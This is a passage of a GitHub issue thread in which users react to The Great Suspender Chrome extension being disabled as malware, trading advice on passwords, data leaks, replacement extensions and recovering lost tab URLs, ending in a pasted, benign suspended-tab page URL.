class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@timetopanic</strong> I mean this in a helpful way: if you truly care about security as much as you just said you did, you might consider not using any chrome extensions whatsoever (except, maybe, those authored by Google). Every single extension that you use exposes you to this very same risk (a new owner coming in and modifying the code). It's not unique to TGS.</p> </blockquote> <p>I'll be honest, I never even considered that this could happen. I only had that extension, plus an ad blocker, so I'm not very well versed in the history of browser extensions. I was under the impression that Google kept a very close eye on the items offered in their store. I'll be a lot more wary of the items that I download in the future.</p> <blockquote> <blockquote> <p>Honestly I could not care less about the tabs - I had a general idea about what all of them were, and none were particularly important.<br /> The possible data breach is far more concerning to me. I have no idea what passwords were compromised and in what location - I have a rotation of 7-8 passwords that I use and I'm now wondering which of them have been compromised and where. I also am very concerned about personal information, like my SSN, being in the hands of some unknown entity.</p> </blockquote> <p>If passwords were in fact compromised from this event, then likely all your passwords would be compromised and would need to be changed.</p> <p>I wouldn't be concerned at all about your private info falling into the wrong hands, even your SSN. All that info is so readily available and easily attainable anyway. SSN as a form of unique & secure ID is an absolute joke, especially given how we use it. In either case, your private info and SSN are already circulating on the dark web from countless other leaks in the past. You just have to be unlucky enough to end up targeted out of the whole batch, nothing you can do about any of this. I don't mean to freak out those who are security-obsessed, but what I'm saying basically is that there is no reason to stress yourself out extra over your personal info getting out. You simply need to maintain the same degree of awareness of looking out for potential identity theft as you would any other given day.</p> <p>TLDR; Don't worry about your personal info being leaked. If they want to use it, they almost certainly already have it.</p> </blockquote> <p>Yes, this is kind of what I was afraid of. I'll adjust passwords on all my financials and get my cards replaced. I'll need to change the schema I've been using for passwords for the last 10 or so years.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/84495705?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="timetopanic picture"> <strong>timetopanic</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@timetopanic</strong> I would recommend a password manager instead of a schema. One or a few leaks and the pattern can be guessed.</p> <p>PS: It's unbelievable how long it took them to automatically remove the extension. I think that for most of us here was a couple of months ago (or more?).</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/11562215?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="orlandoryo picture"> <strong>orlandoryo</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Going on seven months since I wrote this summary. If this bug was a pregnancy, it'd almost be ready to come out.</p> <p>I know there are quite a few bugs in the digital world that are old enough to vote, but still.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@drullo</strong> maybe <a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/session-buddy/edacconmaakjimmfgnblocblbcdcpbko">Session Buddy</a> will help you out. Sorry for your loss.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/9877150?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Technetium1 picture"> <strong>Technetium1</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Agree that someone should def throw marvelous suspender on the store. I could if nobody else will.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30274440?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="justingolden21 picture"> <strong>justingolden21</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Agree that someone should def throw marvelous suspender on the store. I could if nobody else will.</p> </blockquote> <p>what?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>Agree that someone should def throw marvelous suspender on the store. I could if nobody else will.</p> </blockquote> <p>what?</p> </blockquote> <p>Someone mentioned it was not on the store. I found it here though: <a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa?hl=en">https://chrome.google.com/webstore/detail/the-marvellous-suspender/noogafoofpebimajpfpamcfhoaifemoa?hl=en</a></p> <p>I no longer see their comment in this discussion though.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30274440?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="justingolden21 picture"> <strong>justingolden21</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>I no longer see their comment in this discussion though.</p> </blockquote> <p>probably either posted sometime around January, when there was a fork on github but none published on the store. Could also be buried somewhere in my wall of text, or in one of the other issues.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Yeah that makes sense.</p> <p>I tried the marvelous suspender and GOD that thing is killing me. I have a gaming desktop with 32gb of RAM and I was comfortably watching a video when the entire thing stuttered, the video cut out, I couldn't move or see my mouse, and the desktop even got loud. Well turns out, marvelous suspender decided to suspend like twenty tabs at the same time, and it nearly bricked my machine for almost a minute... Hopefully this is a one time thing after installing since all tabs probably expired at the same time, but man they need to fix that, make them suspend 30 seconds after the previous one or something.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30274440?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="justingolden21 picture"> <strong>justingolden21</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">1</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@timetopanic</strong> I would recommend a password manager instead of a schema. One or a few leaks and the pattern can be guessed.</p> <p>PS: It's unbelievable how long it took them to automatically remove the extension. I think that for most of us here was a couple of months ago (or more?).</p> </blockquote> <p>Do you have a recommendation for a good password manager? One that WON'T sell me out without me even knowing?<br /> It shocked me, as well. It took THREE MONTHS for Google to disable it on my browser after they had done so to everyone else, and they didn't even send a warning to the primary account that there could be possible data breaches. I had to research it all myself.</p> <blockquote> <p>Going on seven months since I wrote this summary. If this bug was a pregnancy, it'd almost be ready to come out.</p> <p>I know there are quite a few bugs in the digital world that are old enough to vote, but still.</p> </blockquote> <p>This completely blows my mind. For some reason I was under the impression Google kept a close eye on the items they offer in their store, yet it took nearly 8 months to remove this.<br /> I'm pretty much shuttering my use of Google after this and moving to a different provider for their various services. It's unfortunate that I can't completely escape them, but I'll be providing as little money to the company as possible in the future.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/84495705?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="timetopanic picture"> <strong>timetopanic</strong> <span class="text-muted ml-1">on 21 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>It's probably because i have hundreds of tabs snoozed, but Marvelous<br /> Suspender causes my PC to go into perpetual micro lag after a day or two.</p> <p>Didn't have this problem with Great Suspender back in the day.</p> <p>On Sat, 22 May 2021, 5:20 am Justin Golden, <strong><em>@</em></strong>.<em>*</em>><br /> wrote:</p> <blockquote> <p>Yeah that makes sense.</p> <p>I tried the marvelous suspender and GOD that thing is killing me. I have a<br /> gaming desktop with 32gb of RAM and I was comfortably watching a video when<br /> the entire thing stuttered, the video cut out, I couldn't move or see my<br /> mouse, and the desktop even got loud. Well turns out, marvelous suspender<br /> decided to suspend like twenty tabs at the same time, and it nearly bricked<br /> my machine for almost a minute... Hopefully this is a one time thing after<br /> installing since all tabs probably expired at the same time, but man they<br /> need to fix that, make them suspend 30 seconds after the previous one or<br /> something.</p> <p>—<br /> You are receiving this because you commented.<br /> Reply to this email directly, view it on GitHub<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-846266886">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-846266886</a>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/AF3BXFY54HXFAV5X3HJAKQLTO3FCXANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/AF3BXFY54HXFAV5X3HJAKQLTO3FCXANCNFSM4TI37TGQ</a><br /> .</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/24517527?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="alvinlim-ucb picture"> <strong>alvinlim-ucb</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>private info and SSN are already circulating on the dark web from countless other leaks in the past</p> </blockquote> <p>Go ahead, find mine. I'll pay you 1 BTC. That's a load of fearmongering tosh. Seems you either watched too much Hollywood nonsense or are careless enough and are projecting. No, private info of most of us is not "already circulating on the dark web from countless other leaks in the past", even though many leaks did happen, including banks, facebook and others. The planet is bigger than the US of A.</p> <blockquote> <p>TLDR; Don't worry about your personal info being leaked.</p> </blockquote> <p>Absolutely worry about personal info being leaked. Take good measures to protect and prevent your personal info getting leaked. That's how people get mugged or houses getting broken into nowadays (see BlockFi leak). At the very least don't whore them out to anyone who asks.</p> <blockquote> <p>Odd, how are there so many people only getting the extension disabled by Chrome now, and not months earlier like the rest of us? I wonder...</p> </blockquote> <p>Not odd at all. Some people don't close/restart their browser every day. Some have laptops that only sleep and apply manual updates after a few months.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8780617?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aleqx picture"> <strong>aleqx</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>You can consider it fearmongering, but I think we can sensibly debate just how readily available everyone's private info is online, if one knows where to look.</p> <p>Obviously don't be careless with your personal info and just openly share it willy-nilly. That wasn't what I was suggesting. My point was to highlight that if your private info gets out, it's not the end of the world. But of course you should be treating your personal info like any other sensitive data and only use where appropriate.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>we can sensibly debate how readily available everyone's private info is online</p> </blockquote> <p>More baseless statements, the opposite of sensible. Like I said, go ahead and find mine or else stop this narrative as it's unhelpful at best, and it says more about you than about anyone else.</p> <blockquote> <p>if your private info gets out, it's not the end of the world</p> </blockquote> <p>Once again you are making this unhelpful and tone deaf statement, despite having had it pointed it out to you that people have been kidnapped, mugged, or had houses broken into because of online leaks. Everyone should take personal data leaks very seriously. If you become aware of your private info getting leaked, assess the risk and take action accordingly -- don't stay idle ignoring it (like this guy keeps suggesting). This isn't the same as being spammed.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8780617?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aleqx picture"> <strong>aleqx</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Yeah that makes sense.</p> <p>I tried the marvelous suspender and GOD that thing is killing me. I have a gaming desktop with 32gb of RAM and I was comfortably watching a video when the entire thing stuttered, the video cut out, I couldn't move or see my mouse, and the desktop even got loud. Well turns out, marvelous suspender decided to suspend like twenty tabs at the same time, and it nearly bricked my machine for almost a minute... Hopefully this is a one time thing after installing since all tabs probably expired at the same time, but man they need to fix that, make them suspend 30 seconds after the previous one or something.</p> </blockquote> <blockquote> <p>It's probably because i have hundreds of tabs snoozed, but Marvelous Suspender causes my PC to go into perpetual micro lag after a day or two. Didn't have this problem with Great Suspender back in the day.</p> </blockquote> <p>I haven't experienced this at all with Marvellous Suspender, and I have tons of tabs too. Have you guys set the auto-suspend to something reasonable, like 2 days? Also disable suspending on low memory and screenshots</p> <blockquote> <blockquote> <p><strong>@timetopanic</strong> I would recommend a password manager instead of a schema. One or a few leaks and the pattern can be guessed.<br /> PS: It's unbelievable how long it took them to automatically remove the extension. I think that for most of us here was a couple of months ago (or more?).</p> </blockquote> <p>Do you have a recommendation for a good password manager? One that WON'T sell me out without me even knowing?<br /> It shocked me, as well. It took THREE MONTHS for Google to disable it on my browser after they had done so to everyone else, and they didn't even send a warning to the primary account that there could be possible data breaches. I had to research it all myself.</p> </blockquote> <p>I highly recommend <a rel="nofollow noopener" target="_blank" href="https://bitwarden.com/">BitWarden</a>. I've tried tons of the password managers out there and this is the best of them all IMO. It's open source and (almost) completely free. Solid UI, full cross-platform compatibility, optional cloud database & vault accessible anywhere, password sharing, password generator, full auto-fill and auto-update support, etc.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>we can sensibly debate how readily available everyone's private info is online</p> </blockquote> <p>More baseless statements, the opposite of sensible. Like I said, go ahead and find mine or else stop this narrative as it's unhelpful at best, and it says more about you than about anyone else.</p> <blockquote> <p>if your private info gets out, it's not the end of the world</p> </blockquote> <p>Once again you are making this unhelpful and tone deaf statement, despite having had it pointed it out to you that people have been kidnapped, mugged, or had houses broken into because of online leaks. Everyone should take personal data leaks very seriously. If you become aware of your private info getting leaked, assess the risk and take action accordingly -- don't stay idle ignoring it (like this guy keeps suggesting).</p> </blockquote> <p>So what is the measure you're suggesting one should be taking when their personal info (almost inevitably) gets leaked at some point? Move to a new home and change your name and SSN every single time a web service gets hacked? There isn't anything actionable on your part when your personal info is leaked alongside everyone else's, outside of staying vigilant for potential identity theft.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>So what is the measure you're suggesting one should be taking when their personal info (almost inevitably) gets leaked at some point? Move to a new home and change your name and SSN every single time a web service gets hacked? There isn't anything actionable on your part when your personal info is leaked alongside everyone else's, outside of staying vigilant for potential identity theft.</p> </blockquote> <p>You continue to make statements as if they are undebatable truths. They also happen to be false. If your credit card data leaks do you stay idle? If you choose to stay idle when all your private info including address, balances, transaction history, etc gets leaked then that's very much on you; stating nothing can be done and also advising others to stay idle and not worry about it is the opposite of pertinent and helpful. Pertinent people take measures (e.g. depending on the risk level - increase premises protection, hire personal protection, move out then avoid using home/office addresses but purchase virtual ones, etc etc). </p> <p>It's clear you are neither aware, nor getting the idea or be able to admit you were talking nonsense. It's not like this discussion is leading anywhere, so I'm out (my intervention was intended for the benefit of the others). People like you are making the job of security professionals and cypherpunks harder. Please stop.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8780617?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aleqx picture"> <strong>aleqx</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>So what is the measure you're suggesting one should be taking when their personal info (almost inevitably) gets leaked at some point? Move to a new home and change your name and SSN every single time a web service gets hacked? There isn't anything actionable on your part when your personal info is leaked alongside everyone else's, outside of staying vigilant for potential identity theft.</p> </blockquote> <p>You continue to make statements as if they are undebatable truths. They also happen to be false. If your credit card data leaks do you stay idle? If you choose to stay idle when all your private info including address, balances, transaction history, etc gets leaked then that's very much on you; stating nothing can be done and also advising others to stay idle and not worry about it is the opposite of pertinent and helpful. Pertinent people take measures (e.g. depending on the risk level - increase premises protection, hire personal protection, move out then avoid using home/office addresses but purchase virtual ones, etc etc).</p> <p>It's clear you are neither aware, nor getting the idea or be able to admit you were talking nonsense. It's not like this discussion is leading anywhere, so I'm out (my intervention was intended for the benefit of the others). People like you are making the job of security professionals and cypherpunks harder. Please stop.</p> </blockquote> <p>When did I say you should standby on leaked credit cards? Of course you shouldn't. Look back, this whole time I have been talking about <strong>personal info</strong> - that encompasses simple things like your address and name, not your finances, wow. Those would fall under the category of <strong>sensitive info,</strong> not personal info.</p> <p>For anyone with the capacity, time, capability, and finances for taking countermeasures against leaked info, go right ahead. Not all of us have the privilege or means for things like 'hiring personal protection'.</p> <p>You're misconstruing what I keep trying to say, and therefore perceive it as nonsense. There is leaked info that is very much actionable and should be taken very seriously - things like leaked credit cards, etc. Your personal info does not fall into that category.<br /> We'll stop here then since we seem to fundamentally disagree on whether leaked personal info is something to be worried about. For anyone reading, take whichever stance on the matter that seems right to you. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2044760?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Koolstr picture"> <strong>Koolstr</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>2h for me. Wouldn't 2 days sort of defeat the purpose of this?</p> <p>Just switched off native Chrome memory saving. Let's see if that helps.</p> <p>On Sat, 22 May 2021, 7:35 am Jeffrey Nichtberger, <strong><em>@</em></strong>.<em>*</em>><br /> wrote:</p> <blockquote> <p>Yeah that makes sense.</p> <p>I tried the marvelous suspender and GOD that thing is killing me. I have a<br /> gaming desktop with 32gb of RAM and I was comfortably watching a video when<br /> the entire thing stuttered, the video cut out, I couldn't move or see my<br /> mouse, and the desktop even got loud. Well turns out, marvelous suspender<br /> decided to suspend like twenty tabs at the same time, and it nearly bricked<br /> my machine for almost a minute... Hopefully this is a one time thing after<br /> installing since all tabs probably expired at the same time, but man they<br /> need to fix that, make them suspend 30 seconds after the previous one or<br /> something.</p> <p>It's probably because i have hundreds of tabs snoozed, but Marvelous<br /> Suspender causes my PC to go into perpetual micro lag after a day or two.<br /> Didn't have this problem with Great Suspender back in the day.<br /> … <#m_-7930041490622704620_><br /> On Sat, 22 May 2021, 5:20 am Justin Golden, <em>@</em>.<em>*</em>> wrote: Yeah that<br /> makes sense. I tried the marvelous suspender and GOD that thing is killing<br /> me. I have a gaming desktop with 32gb of RAM and I was comfortably watching<br /> a video when the entire thing stuttered, the video cut out, I couldn't move<br /> or see my mouse, and the desktop even got loud. Well turns out, marvelous<br /> suspender decided to suspend like twenty tabs at the same time, and it<br /> nearly bricked my machine for almost a minute... Hopefully this is a one<br /> time thing after installing since all tabs probably expired at the same<br /> time, but man they need to fix that, make them suspend 30 seconds after the<br /> previous one or something. — You are receiving this because you commented.<br /> Reply to this email directly, view it on GitHub <#1263 (comment)<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-846266886">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-846266886</a>>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/AF3BXFY54HXFAV5X3HJAKQLTO3FCXANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/AF3BXFY54HXFAV5X3HJAKQLTO3FCXANCNFSM4TI37TGQ</a><br /> .</p> <p>I haven't experienced this at all with Marvellous Suspender, and I have<br /> tons of tabs too. Have you guys set the auto-suspend to something<br /> reasonable, like 2 days? Also disable suspending on low memory and<br /> screenshots</p> <p><strong>@timetopanic</strong> <a rel="nofollow noopener" target="_blank" href="https://github.com/timetopanic">https://github.com/timetopanic</a> I would recommend a<br /> password manager instead of a schema. One or a few leaks and the pattern<br /> can be guessed.<br /> PS: It's unbelievable how long it took them to automatically remove the<br /> extension. I think that for most of us here was a couple of months ago (or<br /> more?).</p> <p>Do you have a recommendation for a good password manager? One that WON'T<br /> sell me out without me even knowing?<br /> It shocked me, as well. It took THREE MONTHS for Google to disable it on<br /> my browser after they had done so to everyone else, and they didn't even<br /> send a warning to the primary account that there could be possible data<br /> breaches. I had to research it all myself.</p> <p>I highly recommend BitWarden <a rel="nofollow noopener" target="_blank" href="https://bitwarden.com/">https://bitwarden.com/</a>. I've tried tons of<br /> the password managers out there and this is the best of them all IMO. It's<br /> open source and (almost) completely free. Solid UI, full cross-platform<br /> compatibility, optional cloud database & vault accessible anywhere,<br /> password sharing, password generator, full auto-fill and auto-update<br /> support, etc.</p> <p>—<br /> You are receiving this because you commented.<br /> Reply to this email directly, view it on GitHub<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-846309846">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-846309846</a>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/AF3BXF2NQGMF6O7HOAIHIO3TO3U5FANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/AF3BXF2NQGMF6O7HOAIHIO3TO3U5FANCNFSM4TI37TGQ</a><br /> .</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/24517527?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="alvinlim-ucb picture"> <strong>alvinlim-ucb</strong> <span class="text-muted ml-1">on 22 May 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>My computer is on 24/7/365 and I also had the issue with Google doing the block on The Great Suspender extension sometime after 5PM May 19, 2021 and 5AM May 20, 2021 San Francisco, Califorrnia USA time so I wonder if the people who got the block earlier were all located at certain geographical locations. </p> <p>In any case, it seems like all the data files are already gone and even closing Chrome and starting it with the computer offline, the extension is disabled and does not become enabled to be able to show the Current and Recent sessions. Even manually loading v7.1.6 of The Great Suspender using Load Unpacked Extension did not work as it still would not show any sessions as the data needed is already gone.</p> <p>And while using the browsers history and searching for klbibkeccnjlkjkiokjodocebajanakg, I noticed that everyone seems to mention the ones where the link is the following type:<br /> chrome-<a rel="nofollow noopener" target="_blank" href="extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.html#ttl">extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.html#ttl</a>=Map%3A%20Bay%20Area%20property%20taxes%20%7C%20KRON4&pos=0&uri=<a rel="nofollow noopener" target="_blank" href="https://www.kron4.com/news/bay-area/map-bay-area-property-taxes/">https://www.kron4.com/news/bay-area/map-bay-area-property-taxes/</a></p> <p>This one, the URL is obvious as it's right after the uri= </p> <p>but it seems like a lot of my tabs has something that no one else mentioned like this for example where the uri= starts with <a rel="nofollow noopener" target="_blank" href="data:text/html">data:text/html</a></p> <p><code> chrome-extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.html#ttl=%E2%98%BE%20Photos%20-%20Google%20Photos&pos=0&uri=data:text/html;charset=utf-8,%3C!DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%0AArray.prototype.each%20%3D%20function(callback)%20%7B%0A%20%20%20%20for(var%20i%20%3D%200%3B%20i%20%3C%20this.length%3B%20i%2B%2B)%20%7B%0A%20%20%20%20%20%20%20%20callback(this%5Bi%5D)%3B%0A%20%20%20%20%7D%0A%7D%3B%0A%0ANodeList.prototype.each%20%3D%20Array.prototype.each%3B%0A%0Afunction%20setFavicon(faviconHref)%20%7B%0A%20%20%20%20var%20link%20%3D%20document.createElement('link')%3B%0A%20%20%20%20link.type%20%3D%20'image%2Fx-icon'%3B%0A%20%20%20%20link.rel%20%3D%20'shortcut%20icon'%3B%0A%20%20%20%20link.href%20%3D%20faviconHref%3B%0A%20%20%20%20document.getElementsByTagName('head')%5B0%5D.appendChild(link)%3B%0A%7D%0A%0Awindow.onload%20%3D%20function()%20%7B%0A%20%20%20%20var%20pageInfo%20%3D%20%7B%22url%22%3A%22https%3A%2F%2Fphotos.google.com%2F%22%2C%22title%22%3A%22Photos%20-%20Google%20Photos%22%2C%22favIconUrl%22%3A%22https%3A%2F%2Fssl.gstatic.com%2Fimages%2Fbranding%2Fproduct%2F1x%2Fphotos_64dp.png%22%7D%3B%0A%0A%20%20%20%20document.title%20%3D%20document.title%20%2B%20'%20'%20%2B%20pageInfo.title%3B%0A%20%20%20%20setFavicon(pageInfo.favIconUrl)%3B%0A%0A%20%20%20%20document.querySelectorAll('.pageTitle').each(function(o)%20%7B%0A%20%20%20%20%20%20%20%20o.innerText%20%3D%20pageInfo.title%3B%0A%20%20%20%20%7D)%3B%0A%0A%20%20%20%20document.querySelectorAll('.pageURL').each(function(o)%20%7B%0A%20%20%20%20%20%20%20%20o.innerText%20%3D%20pageInfo.url%3B%0A%20%20%20%20%7D)%3B%0A%0A%20%20%20%20var%20restorePage%20%3D%20function()%20%7B%0A%20%20%20%20%20%20%20%20if%20(window.history.length%20%3E%3D%202)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20window.history.back()%3B%0A%20%20%20%20%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20document.location.href%20%3D%20pageInfo.url%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20document.querySelectorAll('a.pageURLLink').each(function(o)%20%7B%0A%20%20%20%20%20%20%20%20o.onclick%20%3D%20restorePage%3B%0A%20%20%20%20%7D)%3B%0A%0A%20%20%20%20document.body.onclick%20%3D%20restorePage%3B%0A%0A%20%20%20%20window.addEventListener('keyup'%2C%20function(event)%20%7B%0A%20%20%20%20%20%20%20%20if%20(event.keyIdentifier%20%3D%3D%20%22U%2B0020%22)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20restorePage()%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D)%3B%0A%7D%0A%0A%20%20%20%20%3C%2Fscript%3E%0A%20%20%20%20%3Cstyle%3E%0A%0Ahtml%20%7B%0A%20%20%20%20cursor%3A%20pointer%3B%0A%7D%0A%0Abody%20%7B%0A%20%20%20%20font-family%3A%20'Helvetica%20Neue'%2C%20'Arial'%3B%0A%20%20%20%20background-color%3A%20lightgray%3B%0A%7D%0A%0Adiv%23info%20%7B%0A%20%20%20%20margin-left%3A%20auto%3B%0A%20%20%20%20margin-right%3A%20auto%3B%0A%20%20%20%20margin-top%3A%20100px%3B%0A%20%20%20%20text-align%3A%20center%3B%0A%20%20%20%20width%3A%20500px%3B%0A%20%20%20%20border-radius%3A%206px%3B%0A%20%20%20%20border%3A%201px%20solid%20darkgray%3B%0A%20%20%20%20padding%3A%2020px%3B%0A%20%20%20%20background-color%3A%20white%3B%0A%20%20%20%20box-shadow%3A%200%202px%208px%20rgba(0%2C%200%2C%200%2C%200.3)%3B%0A%7D%0A%0Ah1%20%7B%0A%20%20%20%20font-size%3A%2020px%3B%0A%7D%0A%0Aa.wakeUpButton%20%7B%0A%20%20%20%20color%3A%20white%3B%0A%20%20%20%20text-decoration%3A%20none%3B%0A%20%20%20%20border-radius%3A%206px%3B%0